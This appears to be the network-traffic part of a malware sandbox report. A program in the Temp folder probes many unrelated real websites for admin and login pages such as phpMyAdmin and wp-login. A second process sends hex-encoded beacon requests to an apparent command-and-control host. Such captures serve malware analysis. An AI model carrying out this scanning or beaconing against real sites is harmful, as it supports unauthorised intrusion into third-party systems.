Feb 5, 2024 12:14:55.048665047 CET | 1190 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:54 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 29 Jan 2024 23:30:02 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                ETag: "65b834fa-13b"
                                                                                                                                                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_A8zp6X3e5UjxX3ZIdT5DCnyb/btbWP7Oq3lYdD6prZ/FzoJByLpPMsnxK+oSHC+tF5ZlAfCQnkXoFp0JUK8kDA
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: caf_ipaddr=81.181.57.74;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: country=RO;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: expiry_partner=;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.js"></script></head><body><div id="root"></div></body></html>
Feb 5, 2024 12:14:55.256143093 CET | 1190 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Mon, 05 Feb 2024 11:14:54 GMT
Content-Type: text/html
Content-Length: 315
Last-Modified: Mon, 29 Jan 2024 23:30:02 GMT
Connection: keep-alive
ETag: "65b834fa-13b"
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_A8zp6X3e5UjxX3ZIdT5DCnyb/btbWP7Oq3lYdD6prZ/FzoJByLpPMsnxK+oSHC+tF5ZlAfCQnkXoFp0JUK8kDA
Cache-Control: no-cache
X-Content-Type-Options: nosniff
Set-Cookie: caf_ipaddr=81.181.57.74;Path=/;Max-Age=86400;
Set-Cookie: country=RO;Path=/;Max-Age=86400;
Set-Cookie: city="";Path=/;Max-Age=86400;
Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400;
Set-Cookie: expiry_partner=;Path=/;Max-Age=86400;
Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400;
Accept-Ranges: bytes
Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.js"></script></head><body><div id="root"></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
310 | 192.168.2.6 | 57376 | 164.100.128.15 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:55.699749947 CET | 178 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: upsconline.nic.in
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:56.088303089 CET | 141 | IN | HTTP/1.0 302 Moved Temporarily
Location: https://upsconline.nic.in/phpmyadmin/
Server: BigIP
Connection: Keep-Alive
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
311 | 192.168.2.6 | 56961 | 54.71.181.160 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:58.593199968 CET | 180 | OUT | GET /admin.php HTTP/1.1
Host: ucivirtual.uci.edu.mx
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:58.764980078 CET | 1286 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/10.0
Date: Mon, 05 Feb 2024 11:14:13 GMT
Content-Length: 1245
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its
Feb 5, 2024 12:14:58.764998913 CET | 97 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
312 | 192.168.2.6 | 56373 | 124.237.208.37 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:58.593204021 CET | 175 | OUT | GET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pan.baidu.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:58.983494997 CET | 1280 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:58 GMT
                                                                                                                                                                                                                                                                                                                                                                Etag: W/"634e1b8f-1d60"
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 18 Oct 2022 03:20:47 GMT
                                                                                                                                                                                                                                                                                                                                                                Logid: 8900801609501896148
                                                                                                                                                                                                                                                                                                                                                                P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BAIDUID=EB8CC7650E617F0D35F2D5C2F1E7BC8D:FG=1; expires=Tue, 04-Feb-25 11:14:58 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: BaiduCloud
                                                                                                                                                                                                                                                                                                                                                                Yld: 8900801609501896148
                                                                                                                                                                                                                                                                                                                                                                Yme: ZIGW/y8rX0QMaTE=
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
Feb 5, 2024 12:14:58.983521938 CET | 1280 | IN
Feb 5, 2024 12:14:58.983537912 CET | 211 | IN
Feb 5, 2024 12:14:58.983553886 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
Feb 5, 2024 12:14:58.989308119 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
Feb 5, 2024 12:14:59.195375919 CET | 1280 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:58 GMT
                                                                                                                                                                                                                                                                                                                                                                Etag: W/"634e1b8f-1d60"
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 18 Oct 2022 03:20:47 GMT
                                                                                                                                                                                                                                                                                                                                                                Logid: 8900801609501896148
                                                                                                                                                                                                                                                                                                                                                                P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BAIDUID=EB8CC7650E617F0D35F2D5C2F1E7BC8D:FG=1; expires=Tue, 04-Feb-25 11:14:58 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: BaiduCloud
                                                                                                                                                                                                                                                                                                                                                                Yld: 8900801609501896148
                                                                                                                                                                                                                                                                                                                                                                Yme: ZIGW/y8rX0QMaTE=
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
Feb 5, 2024 12:14:59.362777948 CET | 216 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
313 | 192.168.2.6 | 58098 | 76.223.26.96 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:15:01.599049091 CET | 287 | OUT | GET /administrator/index.php?usid=27&utid=4923801494 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ww12.chainmine.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://ww1.chainmine.io/administrator/?usid=27&utid=4923801068
Feb 5, 2024 12:15:01.882478952 CET | 1286 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:01 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_ktrZ201JKoTGYoBocaaOC5ebocGSGMw0PfyGyKijQLyeCXHy6WvbckR213lhKuIIKKhMDBcG1o0BnGGFbX643Q==
                                                                                                                                                                                                                                                                                                                                                                Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                                                                                                Accept-CH: dpr
                                                                                                                                                                                                                                                                                                                                                                Accept-CH: device-memory
                                                                                                                                                                                                                                                                                                                                                                Accept-CH: rtt
                                                                                                                                                                                                                                                                                                                                                                Accept-CH: downlink
                                                                                                                                                                                                                                                                                                                                                                Accept-CH: ect
                                                                                                                                                                                                                                                                                                                                                                Accept-CH: ua
                                                                                                                                                                                                                                                                                                                                                                Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                                                                                                Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                                                                                                Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                                                                                                Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                                                                                                Accept-CH: ua-model
                                                                                                                                                                                                                                                                                                                                                                Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                                                                                                Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                                                                                                X-Domain: chainmine.io
                                                                                                                                                                                                                                                                                                                                                                X-Subdomain: ww12
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
314 | 192.168.2.6 | 58149 | 172.66.41.20 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:15:01.834933043 CET | 178 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: www.yellosa.co.za
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
315 | 192.168.2.6 | 58291 | 34.149.46.130 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:15:07.474234104 CET | 182 | OUT | GET /phpMyAdmin/ HTTP/1.1
Host: accounts.snapchat.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:15:07.577054024 CET | 211 | IN | HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: https://accounts.snapchat.com:443/phpMyAdmin/
Content-Length: 0
Date: Mon, 05 Feb 2024 11:15:07 GMT
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
316 | 192.168.2.6 | 58288 | 64.190.63.111 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:15:07.925204039 CET | 168 | OUT | GET /admin.php HTTP/1.1
Host: foros.net
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:15:08.134255886 CET | 88 | IN | HTTP/1.1 439
date: Mon, 05 Feb 2024 11:15:08 GMT
content-length: 0
server: NginX


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
317 | 192.168.2.6 | 58298 | 45.60.74.50 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:15:07.925297022 CET | 196 | OUT | GET /administrator/index.php HTTP/1.1
Host: zuhauseplus.vodafone.de
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:15:23.109544992 CET | 1232 | IN | HTTP/1.1 503 Service Unavailable
Retry-After: 5
Content-Type: text/html
Cache-Control: no-cache, no-store
Connection: close
X-Iinfo: 18-7271493-0 NNNN RT(1707131707144 2) q(0 0 -1 -1) r(150 -1) b6 U5
Set-Cookie: visid_incap_2490076=kLeaQSZ1RB6mANP3fttPzErDwGUAAAAAQUIPAAAAAAC8rGzozAqaKHOHbzumengl; expires=Mon, 03 Feb 2025 22:24:35 GMT; HttpOnly; path=/; Domain=.vodafone.de
Set-Cookie: incap_ses_9117_2490076=tGTdAjvxwnSj8Hr7LxiGfkrDwGUAAAAAgu2NC6fgHpmbmxBlXbXLHw==; path=/; Domain=.vodafone.de
X-CDN: Imperva
Content-Encoding: gzip
Transfer-Encoding: chunked
X-Iinfo: 13-6888818-6889272 nNYN RT(1707131705768 2156) q(0 0 0 -1) r(150 150) b6 U22


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
318 | 192.168.2.6 | 58286 | 103.224.182.210 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:15:07.925381899 CET | 181 | OUT | GET /wp-login.php HTTP/1.1
Host: followerstiktok.xyz
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:15:08.079030991 CET | 170 | IN | HTTP/1.0 403 Forbidden
cache-control: no-cache
content-type: text/html
Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
319 | 192.168.2.6 | 58302 | 96.7.224.178 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:15:07.925394058 CET | 173 | OUT | GET /admin.php HTTP/1.1
Host: naukrigulf.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:15:08.036154985 CET | 628 | IN | HTTP/1.1 403 Forbidden
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 272
Expires: Mon, 05 Feb 2024 11:15:07 GMT
Date: Mon, 05 Feb 2024 11:15:07 GMT
Connection: close
Server-Timing: cdn-cache; desc=HIT
Server-Timing: edge; dur=1
Server-Timing: ak_p; desc="1707131707977_1611129006_213767433_15_9066_0_0_-";dur=1
Data Ascii: <HTML><HEAD><TITLE>Access Denied</TITLE></HEAD><BODY><H1>Access Denied</H1> You don't have permission to access "http&#58;&#47;&#47;naukrigulf&#46;com&#47;admin&#46;php" on this server.<P>Reference&#32;&#35;18&#46;aee00760&#46;1707131707&#46;cbdd509</BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
320 | 192.168.2.6 | 58301 | 104.21.14.245 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:15:07.925411940 CET | 173 | OUT | GET /admin.php HTTP/1.1
Host: ag.ufa9999.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:15:08.050595999 CET | 1286 | IN | HTTP/1.1 403 Forbidden
Date: Mon, 05 Feb 2024 11:15:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: max-age=15
Expires: Mon, 05 Feb 2024 11:15:22 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=z68UVnYT7amvJkaV8QNmUHQPrE1kIjwMRyjpK57PoYQIZDBEOk6aP7jTmidpCO9l49IgIUG874l1SI3D0qM6UgRVocG8VJc6N33PRsHkyHZnLk65sxCbre7aVKjL8CHamQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 850abbd6df6c0723-ATL
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
321 | 192.168.2.6 | 58300 | 13.248.169.48 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:15:07.926975012 CET | 177 | OUT | GET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: secure.vexcorp.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:15:08.158473969 CET | 1190 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                ETag: "65b834cc-13b"
                                                                                                                                                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_AGraqWJWq6mlj/sabUa92jaX52Ab7hWB4qhvAcvCi7qmUL3rrMsnYWzrZ/GiFk4YebYF6UExWkq7GSsjph0iDA
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: caf_ipaddr=81.181.57.74;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: country=RO;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: expiry_partner=;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.js"></script></head><body><div id="root"></div></body></html>
Feb 5, 2024 12:15:08.365740061 CET | 1190 | IN | HTTP/1.1 200 OK (headers and body identical to the preceding response)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
322 | 192.168.2.6 | 58313 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:15:10.472826958 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:15:10.717425108 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
323 | 192.168.2.6 | 58315 | 185.51.191.48 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:15:14.819574118 CET | 179 | OUT | GET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: innovationdevelopment.eu
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:15:15.036694050 CET | 540 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:14 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Location: http://innovationdevelopment.eu/admin/
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=2592000
                                                                                                                                                                                                                                                                                                                                                                Expires: Wed, 06 Mar 2024 11:15:14 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 246
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://innovationdevelopment.eu/admin/">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
324 | 192.168.2.6 | 58316 | 181.4.228.155 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:15:14.819706917 CET | 182 | OUT | GET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ventas.officeinsumos.com.ar
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:15:15.093442917 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/7.0
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:14 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource
Feb 5, 2024 12:15:15.093491077 CET | 151 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
325 | 192.168.2.6 | 58317 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
